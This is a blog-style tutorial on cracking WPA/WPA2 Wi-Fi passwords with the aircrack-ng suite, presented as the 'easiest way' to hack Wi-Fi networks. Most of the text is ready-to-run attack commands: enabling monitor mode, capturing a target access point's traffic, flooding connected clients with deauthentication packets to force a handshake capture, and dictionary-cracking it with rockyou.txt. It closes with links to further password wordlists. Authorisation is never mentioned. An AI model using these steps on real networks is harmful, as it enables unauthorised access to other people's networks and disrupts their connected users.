Hacking Wifi Networks with Aircrack suite | The Easiest Way

 

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security

• Monitoring: Packet capture and export of data to text files for further processing by third party tools 
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection 
• Testing: Checking WiFi cards and driver capabilities (capture and injection)
•  Cracking: WEP and WPA PSK (WPA 1 and 2)

 Steps to Hack wifi Networks

We are going to follow two basic steps to crack wifi passwords. 

1. Capture the four way Handshake.
2. Cracking the password from capture handshake

1. Capture the Handshake 

What is fourway handshake ? 

Once you connect to a Wifi AP, You use a pre-shared key that you enter into your mobile or laptop to connect to the Wifi access point. Once a device is connecting, it used that password to generate a session key with the help of a process called four-way handshake in which were parameters (not going into detail) are exchanged. This new session key is then used for encrypted communication over Wifi.

If you capture this handshake, you can break it to reveal the password for the Wifi

 

Put your card in Monitor Mode

By default, the Wifi cards capture only that traffic which is intended for your device. By putting it in monitor mode, you are telling your Wifi card to capture all wireless traffic

  

>iwconfig  (Checks for existing Wifi adapter)

>airmon-ng start wlan0  (Activate Monitor Mode)

 

>iwconfig  (Check the device name)

 

 Capture traffic with airodump-ng 

The airodump-ng tool captures all information about the wireless channel including BSSID

>airodump-ng wlan0mon  (Use your card name)

 

Now start capturing the traffic of intended AP (Home in this case)

> airodump-ng -c 6 --bssid C0:F6:C2:5E:8D:20 -w pass wlan0mon 

Here :

-c 6 is the channel for the wireless network
--bssid C0:F6:C2:5E:8D:20 is the access point MAC address. This eliminates extraneous traffic.
-w pass is the file name
-wlan0mon is the interface name.

 

 

 

Deauthenticate the Wireless clients 

Now you need to deauthenticated the connected clients to the AP, so that they are requires to connect again to the AP and we can capture the handshake.

 

>  aireplay-ng -0 100 -a C0:F6:C2:5E:8D:20 wlan0mon

Here :  

--0 means deauthentication

-100 is the number of deauth packets to send 

-a C0:F6:C2:5E:8D:20 is the access point MAC address

-wlan0mon is the interface name.

 

Look for the WPA-Handshake notification in the main capture window. 

Press Ctrl+C to stop capture.

 

 

1.     2. Crack the Handshake

N     Now, we can crack the captured handshake with following command.

 

>aircrack-ng -w /usr/share/wordlists/rockyou.txt -b C0:F6:C2:5E:8D:20 pass*.cap 

Here : 

-w rockyou.txt is the dictionary file. Kali has this inbuilt dictionary already installed

Pass*.cap is the packet file where a captured handshake is stored.

 

Selecting the dictionary file for cracking WPA password 

Sometimes the password list is compressed.

We may need to perform these steps to un compress the file.

>Locate rockyou

 

 Now Un compress the file

>gunzip /usr/share/wordlists/rockyou.txt.gz 

we can check if the file is uncompressed and available with following command.

>ls /usr/share/wordlists/

 

 

 

 Cracking Wifi password

Now to crack the password use the following command

 

> aircrack-ng pass*.cap -w /usr/share/wordlists/rockyou.txt

 

The password if cracked will be revealed. We can see that password home1234 has been cracked successfully.

 

Best Alternate Word lists Collections.

ühttps://weakpass.com/

ühttps://github.com/danielmiessler/SecLists/tree/master/Passwords/WiFi-WPA

ühttps://labs.nettitude.com/blog/rocktastic/

ühttps://github.com/kennyn510/wpa2-wordlists